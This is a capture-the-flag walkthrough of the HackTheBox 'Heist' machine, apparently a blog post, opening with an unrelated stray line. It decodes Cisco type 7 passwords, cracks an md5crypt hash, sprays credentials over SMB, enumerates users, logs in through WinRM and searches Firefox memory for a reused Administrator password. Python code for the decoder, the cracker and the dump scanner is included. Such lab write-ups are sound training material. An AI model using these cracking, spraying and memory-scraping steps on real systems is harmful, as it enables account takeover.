毅种循环

Recite that laughable transgression word by word, as if confiding to a glacier in gossamer threads.

HackTheBox-Heist

Heist brought new concepts that I had never seen before on HTB, while still maintaining a simple difficulty level. I will start by finding a Cisco configuration on the website that contains some usernames and password hashes. After recovering the passwords, I will discover one that can obtain RPC access, which I will use to find more usernames. One of these usernames and one of the original passwords are used to obtain a WinRM session on Heist. From there, I will notice that Firefox is running and dump the process memory to find the original website's password, which is also the administrator password for the box.

Information Gathering

└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds

Ports 80, 135 and 445 are open. Starting with the web server on port 80:

The page is a login form. Weak passwords did not get me in, but there is an option to log in as a guest.

Password Cracking

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

The guest view exposes a Cisco IOS configuration. Two kinds of credential are stored in it. First, two local users with type 7 passwords:

username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Type 7 is not a hash but a reversible obfuscation (a fixed-key XOR), so these can be decoded outright. Second, the enable secret that protects privileged EXEC mode:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

Type 5 is md5crypt (the $1$ prefix), a real salted hash, so it has to be cracked rather than decoded.

CMD5 did not return anything for these strings, so I used a dedicated online Cisco type 7 decoder instead:
https://www.ifm.net.nz/cookbooks/passwordcracker.html


The decoder returns $uperP@ssword for rout3r and Q4)sJu\Y8qz*A3?d for admin.
That leaves the type 5 enable secret. John the Ripper identifies the $1$ format as md5crypt on its own; a run against rockyou finishes in under two minutes:

└─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent    (?)   
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

That gives a third password, stealth1agent. Two usernames and three passwords so far:

User        Password
rout3r      $uperP@ssword
admin       Q4)sJu\Y8qz*A3?d
(enable)    stealth1agent

Nothing says these map one-to-one onto Windows accounts, so every user/password combination is worth trying.
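The two password formats in the configuration differ in kind, and that difference is why one needed a decoder and the other needed John. Type 7 is Cisco's reversible obfuscation: the first two digits are an offset into a fixed, publicly known key string and every following hex byte is XORed with the next key character, so anyone holding the config holds the plaintext. Type 5 is md5crypt, a salted, 1000-round MD5 construction that can only be recovered by guessing. The Python below is an added example, not part of the original writeup or of any Cisco tooling: it decodes the two type 7 strings from the config above and re-implements md5crypt to check candidates against the enable secret the way a cracker does. The key string and algorithm are the standard ones; the three-word wordlist is constructed here as a stand-in for rockyou.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional

# Fixed key Cisco uses for "password 7" obfuscation (publicly known since the 1990s).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(blob: str) -> str:
    """Reverse a Cisco type 7 string: 2-digit key offset, then XORed hex bytes."""
    seed = int(blob[:2])
    data = bytes.fromhex(blob[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: emit `count` characters, low 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt ($1$), the algorithm behind 'enable secret 5'."""
    salt = salt[:8]
    alt = hashlib.md5(password + salt + password).digest()
    ctx = hashlib.md5(password + b"$1$" + salt)
    for i in range(len(password)):          # mix in alt, one byte per password byte
        ctx.update(alt[i % 16:i % 16 + 1])
    i = len(password)
    while i:                                # append NUL or pw[0] per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                   # 1000 rounds whose layout depends on i
        h = hashlib.md5()
        h.update(password if i & 1 else final)
        if i % 3:
            h.update(salt)
        if i % 7:
            h.update(password)
        h.update(final if i & 1 else password)
        final = h.digest()
    enc = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (b"$1$" + salt + b"$" + enc).decode("ascii")


def crack_enable_secret(secret: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on an 'enable secret 5' hash; returns the plaintext or None."""
    _, _, salt, _ = secret.split("$")
    for word in wordlist:
        if md5crypt(word.encode(), salt.encode()) == secret:
            return word
    return None


TYPE7_LINE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+7\s+([0-9A-Fa-f]+)", re.M
)


def harvest(config: str) -> Dict[str, str]:
    """Decode every 'username ... password 7' line in an IOS config."""
    return {user: decode_type7(blob) for user, blob in TYPE7_LINE.findall(config)}


# The credential lines from the configuration shown on this page.
CONFIG = """
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for user, pw in harvest(CONFIG).items():
        print(f"{user}: {pw}")
    # Constructed mini wordlist standing in for rockyou.txt.
    print("enable:", crack_enable_secret("$1$pdQG$o8nrSzsGXeaduXrjlvKc91",
                                         ["password", "stealth1agent", "cisco123"]))
```

The asymmetry is the practical lesson: `service password-encryption` protects type 7 strings from a glance over someone's shoulder and from nothing else, while type 5 only holds up as long as the secret is not in a wordlist. Newer IOS releases offer type 8 (PBKDF2-SHA256) and type 9 (scrypt) for both `enable secret` and `username ... secret`, which is what a hardened config should use.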

Lateral Movement on Port 445

Three passwords and an open port 445: the obvious next step is to spray them over SMB with crackmapexec.

None of the combinations worked. Looking back at the web application, the guest login belongs to a user named Hazard, so I added that name to user.txt and ran it again.

└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent

Hazard:stealth1agent is a valid local account over SMB. In my experience the same credentials often work over WinRM as well, so I checked port 5985:

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT     STATE SERVICE
5985/tcp open  wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds


Hazard's credentials are rejected over WinRM, so let's see what the account can reach over SMB.

─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445       Name: 10.129.96.157                                   
        Disk                                                    Permissions Comment
        ----                                                    ----------- -------
        ADMIN$                                                  NO ACCESS   Remote Admin
        C$                                                      NO ACCESS   Default share
        IPC$                                                    READ ONLY   Remote IPC

Hazard can only read IPC$. That share carries the named pipes behind MS-RPC (lsarpc, samr and friends), which is exactly what user enumeration needs, so the foothold is less limited than it looks.

SMB User Enumeration

https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html (a detailed walkthrough of several Impacket tools)

Impacket's lookupsid.py brute-forces RIDs over the lsarpc pipe and asks the host to resolve each SID to a name, which works with any account that can open IPC$:

└─# python3 lookupsid.py hazard:stealth1agent@10.129.96.157
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

With these new names appended to user.txt, I spray the same three passwords again:

└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE

--continue-on-success tells crackmapexec to keep testing the remaining combinations after it finds a valid one instead of stopping at the first hit; without it the run would have ended at Hazard. The second pass turns up a second valid local account: SupportDesk\Chase with the admin password from the router config, Q4)sJu\Y8qz*A3?d.
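Two outputs drive this stage: lookupsid's RID listing, which supplies the user list, and crackmapexec's per-attempt lines, which report both host facts and which pairs worked. The Python below is an added example, not part of the original writeup or of either tool. It parses the exact output shown above (embedded as sample text) into a user list, merges that list into the existing user.txt contents the way the writeup does by hand, and pulls the validated credentials out of the spray output. It also reads the signing flag from the banner line, which is worth noticing on any SMB spray: with signing not required, the host is a candidate for NTLM relay as well. One caveat the tool does not enforce for you: `-u file -p file` tries every password against each user in quick succession, so check the lockout threshold (crackmapexec's `--pass-pol` prints it) before spraying a password list longer than a handful.

```python
import re
from typing import Dict, List, Tuple

# Sample text copied from the lookupsid.py and crackmapexec runs on this page.
LOOKUPSID_OUTPUT = r"""
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
"""

CME_OUTPUT = r"""
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
"""

# "RID: DOMAIN\name (SidTypeUser)" -- groups and aliases are skipped by the type filter.
SID_USER = re.compile(r"^(\d+):\s+[^\\\s]+\\(\S+)\s+\(SidTypeUser\)\s*$", re.M)
# Built-in accounts that never carry a sprayable password on a default install.
BUILTIN_SKIP = {"Guest", "DefaultAccount", "WDAGUtilityAccount"}


def users_from_lookupsid(text: str) -> List[str]:
    """Return account names worth spraying from lookupsid output, lowest RID first."""
    return [name for _rid, name in SID_USER.findall(text) if name not in BUILTIN_SKIP]


def merge_userlist(existing: List[str], discovered: List[str]) -> List[str]:
    """Append newly enumerated names to the current user.txt contents.

    Deduplicates case-insensitively: Windows logon names are not case-sensitive,
    so Hazard from the website and Hazard from lookupsid are one account.
    """
    seen = {u.lower() for u in existing}
    merged = list(existing)
    for user in discovered:
        if user.lower() not in seen:
            merged.append(user)
            seen.add(user.lower())
    return merged


# "SMB <host> <port> <name> [mark] <rest>" where mark is * (banner), + (valid) or - (failed).
CME_LINE = re.compile(r"^SMB\s+(\S+)\s+\d+\s+\S+\s+\[([*+\-])\]\s+(.*?)\s*$", re.M)


def parse_cme(text: str) -> Tuple[Dict[str, object], List[Tuple[str, str, str]]]:
    """Split crackmapexec output into host facts and the (domain, user, password) triples it validated."""
    facts: Dict[str, object] = {}
    valid: List[Tuple[str, str, str]] = []
    for host, mark, rest in CME_LINE.findall(text):
        if mark == "*":
            facts["host"] = host
            facts["smb_signing_required"] = "(signing:True)" in rest
            m = re.search(r"\(domain:([^)]+)\)", rest)
            facts["domain"] = m.group(1) if m else None
        elif mark == "+":
            account, _, password = rest.partition(":")   # password may contain anything but ':'
            domain, _, user = account.partition("\\")
            valid.append((domain, user, password))
    return facts, valid


if __name__ == "__main__":
    users = merge_userlist(["rout3r", "admin", "Hazard"], users_from_lookupsid(LOOKUPSID_OUTPUT))
    print("user.txt:", users)
    facts, valid = parse_cme(CME_OUTPUT)
    print("host facts:", facts)
    for domain, user, password in valid:
        print(f"valid: {domain}\\{user}:{password}")
    if facts.get("smb_signing_required") is False:
        print("SMB signing not required: NTLM relay against this host is possible")
```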

WinRM Connection

┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                   
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>

The new user chase is able to connect.

Obtain User Flag

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> dir
    Directory: C:\Users\Chase\desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        12/9/2022   7:41 AM             34 user.txt
*Evil-WinRM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-WinRM* PS C:\Users\Chase\desktop>

Obtain Root Flag

There are several other users on the box, but Chase has no read access to their desktops.
The todo.txt sitting next to the user flag is worth a look:

*Evil-WinRM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.

The note mentions fixing the router config (the one leaked on the website) and restricting guest access, but neither item gives a new lead, so let's look at the running processes instead.

*Evil-WinRM* PS C:\Users\Chase\desktop> ps
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     1980       5272               368   0 csrss
    290      13     2224       5104               472   1 csrss
    357      15     3448      14572              2156   1 ctfmon
    251      14     3920      13316              3916   0 dllhost
    166       9     1880       9716       0.03   6616   1 dllhost
    614      32    29164      57988               960   1 dwm
   1498      58    23896      78852              5304   1 explorer
   1090      68   128468     205616       5.72   6264   1 firefox
    347      19    10144      38584       0.11   6444   1 firefox
    355      25    16396      38876       0.06   6716   1 firefox
    401      34    34604      92436       0.70   6840   1 firefox
    378      28    22020      58668       0.70   7020   1 firefox
     49       6     1792       4584               768   1 fontdrvhost
     49       6     1492       3808               776   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    976      22     5800      14792               624   0 lsass
    223      13     3072      10308              3220   0 msdtc
      0      12      400      15056                88   0 Registry
    275      14     3096      15000              5448   1 RuntimeBroker
    145       9     1716       7524              5732   1 RuntimeBroker
    303      16     5636      17024              5804   1 RuntimeBroker
    663      32    19716      61648              5668   1 SearchUI
    550      11     5192       9632               608   0 services
    672      28    14788      51860              5576   1 ShellExperienceHost
    440      17     4792      23976              5032   1 sihost
     53       3      528       1100               268   0 smss
    471      22     5812      16264              2460   0 spoolsv
    201      12     1980       9592               332   0 svchost
    150       9     1812       11648               700   0 svchost
     85       5      928       3716               724   0 svchost
    860      20     6944      22496               744   0 svchost
    378      13    10684      14832              852   0 svchost
    868      16     5288      11672              856   0 svchost
    257      10     2016       7648               908   0 svchost
    286      13     4148       11276              1020   0 svchost
    140       7     1364       5620              1068   0 svchost
    126       16     4016       7832              1188   0 svchost
    184       9     1796       7440              1200   0 svchost
    229      12     2628      11208              1216   0 svchost
    430       9     2808       8828              1236   0 svchost
    154       7     1256       5540              1264   0 svchost
    231       9     2168       7512              1304   0 svchost
    367      17     4904      13864              1380   0 svchost
    172      10     1792       8012              1392   0 svchost
    353      14     4380      11480              1440   0 svchost
    163       9     3084       7628              1452   0 svchost
    255      15     3520       8512              1484   0 svchost
    305      11     1976       8740              1492   0 svchost
    191      12     2144      11888              1624   0 svchost
    320      10     2552       8328              1640   0 svchost
    163      11     2868       7356              1716   0 svchost
    161       8     1896       7052              1772   0 svchost
    129       7     1564       6216              1784   0 svchost
    409      32     8448      17000              1820   0 svchost
    196      11     1976       8040              1880   0 svchost
    239      11     2516       9604              1888   0 svchost
    171       9     1532       7176              2120   0 svchost
    332      18    14656      31224              2124   0 svchost
    167      12     4032      10820              2504   0 svchost
    181      22     2488       9796              2512   0 svchost
    462      20    12112      26688              2524   0 svchost
    261      13     2668       7892              2540   0 svchost
    376      15     9708      19304              2564   0 svchost
    133       9     1672       6484              2604   0 svchost
    136       8     1560       6096              2632   0 svchost
    126       7     1224       5264              2656   0 svchost
    205      11     2288       8296              2676   0 svchost
    233      14     4604      11740              2752   0 svchost
    169      10     2204      13200              2816   0 svchost
    209      12     1852       7416              2824   0 svchost
    265      19     3208      12000              2864   0 svchost
    464      17     3448      11820              3076   0 svchost
    193      15     6076      10004              3144   0 svchost
    382      23     3340      12184              3248   0 svchost
    423      48    13668      22296              3256   0 svchost
    211      11     2780      11836              4432   0 svchost
    145       8     1680       7432              4640   0 svchost
    187      12     2636      13236              4696   0 svchost
    169       9     4792      12192              4868   0 svchost
    300      15    12772      14740              4928   0 svchost
    251      14     3188      13740              4940   0 svchost
    228      12     3100      13560              5048   1 svchost
    365      18     5720      27008              5080   1 svchost
    122       7     1288       5520              6208   0 svchost
    115       7     1328       5192              6404   0 svchost
    264      14     3632      12648              6488   0 svchost
    225      12     3624      10940              6572   0 svchost
    321      20    10184      14620              6756   0 svchost
   1891       0      192        136                 4   0 System
    211      20     3976      12372              2036   1 taskhostw
    167      11     2788      10760              2720   0 VGAuthService
    142       8     1696       6844              2692   0 vm3dservice
    136       9     1820       7352              3056   1 vm3dservice
    384      22     9616      22104              2708   0 vmtoolsd
    236      18     5096      15288              5712   1 vmtoolsd
    171      11     1500       6860               492   0 wininit
    280      13     2816      12936               528   1 winlogon
    344      16     8920      18660              3196   0 WmiPrvSE
    812      27    52104      70388       1.78   4316   0 wsmprovhost

Everything else is standard Windows background noise, but the set of Firefox processes in the interactive session (SI 1) stands out: a support server has no business running a browser, and a browser that is logged into something holds that session's credentials in memory. As outlined in the introduction, dumping the Firefox process memory and searching it for the website's login password recovers the password used on the original site, and the local Administrator account reuses it:
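Once a dump of the Firefox process exists, the search itself is the part people get wrong: a plain `strings | grep password` only sees ASCII, while Windows applications keep much of their text as UTF-16LE, so the form body you want can be sitting in the dump and still produce no match. The Python below is an added example, not part of the original writeup: it scans a dump for printable runs in both encodings, keeps the ones mentioning a credential-like keyword, and parses each as a URL-encoded form body to pull out password fields. The dump here is constructed inline (filler bytes around two copies of a login form, one per encoding) and the field names `login_username`/`login_password` are made up; the planted value is the password this box turned out to reuse for Administrator.

```python
import re
from typing import Iterator, List, Tuple
from urllib.parse import parse_qs


def printable_runs(data: bytes, min_len: int = 6) -> Iterator[Tuple[int, str, str]]:
    """Yield (offset, encoding, text) for every printable run in a memory dump.

    Both ASCII and UTF-16LE are scanned; UTF-16LE is a printable byte followed by
    NUL, repeated, which an ASCII-only pass breaks on at every second byte.
    """
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(data):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in utf16_re.finditer(data):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


KEYWORDS = ("password", "passwd", "pwd", "login")


def find_credentials(data: bytes, keywords=KEYWORDS) -> List[Tuple[int, str, str]]:
    """Return the runs that mention a credential-ish keyword, ordered by offset."""
    hits = []
    for off, enc, text in printable_runs(data):
        low = text.lower()
        if any(k in low for k in keywords):
            hits.append((off, enc, text))
    return sorted(hits)


def passwords_from_hits(hits) -> List[str]:
    """Treat each hit as a URL-encoded form body and collect password-like field values."""
    found = set()
    for _, _, text in hits:
        for key, values in parse_qs(text, keep_blank_values=True).items():
            if any(tag in key.lower() for tag in ("pass", "pwd")):
                found.update(v for v in values if v)
    return sorted(found)


# Constructed stand-in for a Firefox memory dump: non-printable filler around two
# copies of a submitted login form, one ASCII and one UTF-16LE. Field names are
# made up; the password is the one this box reuses for the Administrator account.
FORM = b"login_username=admin&login_password=4dD!5}x/re8]FBuZ&login=Login"
FILLER = bytes([0xFF, 0x00, 0x8A, 0x01, 0xFE]) * 40
SAMPLE_DUMP = FILLER + FORM + FILLER + FORM.decode("ascii").encode("utf-16le") + FILLER

if __name__ == "__main__":
    hits = find_credentials(SAMPLE_DUMP)
    for off, enc, text in hits:
        print(f"0x{off:08x} {enc:9} {text}")
    print("candidate passwords:", passwords_from_hits(hits))
```

On a real dump, replace `SAMPLE_DUMP` with the file contents (`Path(dump).read_bytes()`) and expect noise: the keyword filter is deliberately loose, and the form-body parser is only a convenience for the common case of a POSTed login. The point that carries over is the dual-encoding scan.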

└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/9/2022   7:41 AM             34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-WinRM* PS C:\Users\Administrator\Desktop>